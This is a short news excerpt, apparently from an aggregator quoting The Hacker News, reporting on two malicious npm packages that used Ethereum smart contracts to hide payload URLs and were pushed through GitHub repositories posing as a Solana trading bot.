"The software supply chain security firm said the libraries are part of a larger and sophisticated campaign impacting both npm and GitHub, tricking unsuspecting developers into downloading and running them. While the packages themselves make no effort to conceal their malicious functionality, ReversingLabs noted that the GitHub projects that imported these packages took pains to make them look credible. As for the packages themselves, the nefarious behavior kicks in once either of them is used or included in some other project,"
"Although this is par for the course when it comes to malware downloaders, where it stands apart is the use of Ethereum smart contracts to stage the URLs hosting the payload - a technique reminiscent of EtherHiding. The shift underscores the new tactics that threat actors are adopting to evade detection. Further investigation into the packages has revealed that they are referenced in a network of GitHub repositories claiming to be a solana-trading-bot-v2 that leverages"
Two npm packages uploaded in July 2025 used Ethereum smart contracts to conceal malicious commands and install downloader malware on compromised systems. The libraries activated when included in other projects and fetched a next-stage payload from an attacker-controlled server. The campaign affected both npm and GitHub and relied on GitHub projects crafted to appear credible in order to trick developers into downloading and running the packages. The attack used blockchain-hosted URLs to stage payload locations, a technique reminiscent of EtherHiding, reflecting a shift toward on-chain evasion tactics. The packages were referenced by repositories posing as a solana-trading-bot-v2, and associated GitHub accounts are no longer available.
Read at The Hacker News
Unable to calculate read time
Collection
[
|
...
]